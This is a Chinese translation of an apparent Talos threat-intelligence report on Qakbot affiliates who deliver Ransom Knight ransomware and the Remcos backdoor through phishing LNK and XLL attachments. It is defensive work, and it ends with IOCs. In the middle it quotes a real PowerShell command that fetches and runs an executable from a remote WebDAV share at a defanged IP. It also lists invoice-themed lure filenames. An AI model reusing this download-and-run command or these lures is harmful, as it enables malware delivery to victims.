Qakbot 恶意软件背后的威胁行为者自 2023 年 8 月初以来一直在开展活动,通过网络钓鱼电子邮件分发 Ransom Knight 勒索软件和 Remcos 后门。
值得注意的是,这项活动似乎在 FBI 于 8 月下旬占领 Qakbot 基础设施之前就开始了,并且此后一直在进行,这表明执法行动可能没有影响 Qakbot 运营商的垃圾邮件传送基础设施,而只影响了他们的命令和控制 (C2) 服务器。
Talos 将此新活动归因于 Qakbot 附属机构,因为此活动中使用的 LNK 文件中发现的元数据与之前 Qakbot 活动“AA”和“BB”中使用的机器的元数据相匹配。
尽管我们还没有看到威胁行为者在基础设施被摧毁后分发 Qakbot 本身,但我们评估该恶意软件将继续构成重大威胁。我们认为这种情况很可能发生,因为开发人员没有被捕并且仍在运营,因此他们有可能选择重建 Qakbot 基础设施。
在 2023 年 8 月下旬涉及 FBI和许多国际合作伙伴的行动中,执法机构查获了Qakbot 恶意软件使用的基础设施和加密货币资产,对该组织的运营造成了相当大的损害。安全行业的许多人想知道这是否意味着 Qakbot 附属公司将永远消失,或者只是在重建基础设施时暂时失业。
Talos 有一定信心地评估,Qakbot 背后的威胁行为者仍然活跃,并且一直在进行一场在被摧毁之前开始的新活动,分发 Cyclops/Ransom Knight 勒索软件的变体以及 Remcos后门。我们通过将新活动中使用的 LNK 文件中的元数据连接到之前 Qakbot 活动中使用的机器来跟踪这一新活动。
2023 年 1 月,我们撰写了一篇关于使用 LNK 文件中的元数据来识别和跟踪威胁参与者的博文。我们特别详细介绍了“AA”活动中使用的一台驱动器序列号为“0x2848e8a8”的机器后来如何用于名为“ BB ”的新僵尸网络的活动。在我们的博客发布后,负责“ AA”、“BB ”和“ Obama ”活动的主要 Qakbot 参与者开始清除其 LNK 文件中的元数据,以增加检测和跟踪的难度。
Talos 于 2023 年 8 月发现了在上述同一台计算机上创建的新 LNK 文件,但观察到这些文件的有效负载指向命令行中的网络共享,该网络共享为 Ransom Knight 勒索软件的变体提供服务。对文件的进一步分析显示它们指向 Powershell.exe 并传递以下参数以下载下一阶段:
-c "资源管理器'\\89[.]23[.]96[.]203@80\333\'"; 开始-睡眠-第 1 秒;停止进程-名称资源管理器;\\89[.]23[.]96[.]203@80\333\information.exe
上面的命令打开 Explorer.exe 并尝试使用端口 80 上的 WebDAV 访问 IP 89[.]23[.]96[.]203 上的远程网络共享。此方法可能是尝试绕过命令行检测来下载通过 PowerShell 的远程可执行文件(T1105 Ingress Tool Transfer)。
这些 LNK 文件的文件名以紧急财务问题为主题,表明它们是在网络钓鱼电子邮件中分发的,这与之前的 Qakbot 活动一致:
注意-发票-8 月 29 日.docx.lnk
银行转账请求.lnk
预订信息.pdf.lnk
Fattura NON pagata Agosto 2023.docx.lnk
欺诈银行转账报告.pdf.lnk
发票 OTP 银行.pdf.lnk
强制性发票-8 月 28 日.docx.lnk
未付发票-8 月 26 日.pdf.lnk
新协调银行和 IBAN 2023.docx.lnk
新坐标银行和 IBAN 2023.img.lnk
付款发票-8 月 29 日.pdf.lnk
紧急发票 - 8 月 27 日.docx.lnk
一些文件名是用意大利语编写的,这表明威胁行为者可能针对该地区的用户。LNK 文件在 Zip 存档中分发,该存档还包含XLL 文件。XLL 是用于 Excel 加载项的扩展,并带有与其他 Excel 文件格式类似的图标:
网络钓鱼附件之一的压缩内容。
根据我们的分析,这些 XLL 文件是 Remcos 后门,与 Ransom Knight 一起执行,以使威胁行为者在感染后能够访问计算机:
随 Ransom Knight LNK 下载器分发的XLL文件的 VirusTotal 信息。
另一方面,LNK 文件通过 WebDAV 从上面命令行中显示的远程 IP 89[.]23[.]96[.]203 下载可执行文件,这是实际的 Ransom Knight 有效负载。该勒索软件系列是Cyclops 勒索软件即服务的更新版本,从头开始重写。Cyclops 服务背后的威胁参与者于 2023 年 5 月宣布了新变种:
暗网论坛帖子宣布 Ransom Knight 勒索软件。
我们不认为 Qakbot 威胁行为者是勒索软件即服务产品的幕后黑手,而只是该服务的客户。由于这项新行动自 2023 年 8 月初以来一直在持续,并且在被关闭后并未停止,因此我们认为 FBI 行动并未影响 Qakbot 的网络钓鱼电子邮件传送基础设施,而仅影响其命令和控制服务器。尽管我们还没有看到威胁行为者在基础设施被摧毁后分发 Qakbot,但我们评估该恶意软件可能会继续构成重大威胁。鉴于运营商仍然活跃,他们可能会选择重建 Qakbot 基础设施,以完全恢复其拆除前的活动。
IOCs
006e0b5f47462c4d755b3f84e22b90f09fb6b369032a3ca72f39180e5395ed17
19bae62fc0a3a64c80b666237c2f04706e3b89c5a6ea6be055df22122e5f8a63
25cc64a072861840df9dfa7b2449165e4c37d57c542da8ec4ea4fffa10f1be39
44065decc86f79ebbd56b27f1db8c7bd5843147f3fa8e577604c0ed45317b016
6e0062ccdfa7a117a8b76d4056ac144fdf91f3a2811b32d5a3b7f31ac326181b
75c562f9101eab86d03386fcf0ddfe3cdebec0008c2c5b5a94047c06ddeb2566
78784c02843a518bdc546534759dcdb3ea523c54751858a51f39e0f9d1492868
7ab8bcf9b4dc63ad3d9e1fe8eb2e8292a1545871fb2e3b5dd83c96a2b7e33b41
877f8a66be5c99d5a4636d74c566d61ebc1951049be5fa8968c132922ca4ba18
af5f5aa32a3e2bc802b9863c20de2eac0ca14e1002c02396e63e2aa38eb351c6
bfd2c062c12a261c4460cdc59cc9f7e80b72b455e852d08c106f12a3d657a575
d0013d23218a1aafdea792a0599b746af6966f765181c8c1dbfe7257be0cb022
d522a32eebc7f0108dbff116b7fa9dd457bf9f062465060115ec423c567c5115
e38a1648fc6494f881e3b793688ef4d69e925137c4c7494f4dd6c6604142a2bc
ec4ac7ade34402ad3757e97d03de7aa3dfee0ed53f28f32c99d8dbbb96958dcb
f2e2427107648e8d7be5f4e42341c702ceddb442191434128cbbf15c0325d8e9
7b4d227fddcc4e93ea0cdf017026ff2dad6efd6bc7de71b689dc0595a2a4fb4d
a2c654357d790d7c4cec619de951649db31ecdb63935f38b11bb37f983ff58de
c42ad519510936f14ab46fbad53606db8132ea52a11e3fc8d111fbccc7d9ab5a
34ea4cad8558fcab75631a44eae492a54e1cf9ae2f52e7d5fa712686acd06437
597541041b49043bd2abd482b3bf4dd233a0dbb47d5ef704ea9ee28705d2764b
86e96d3d22ead8f41f6a29f7bfe4b35c0d4ae5bd8da046ff0d01d9c6ea678dc2
ef74d2b8d1767667fb6817916f7d2d2c998358e07422a6af246151e0299f26aa
89.23.96.203
188.34.188.7转载来源: https://blog.talosintelligence.com/qakbot-affiliated-actors-distribute-ransom/
图片来源网络侵权可联系删除
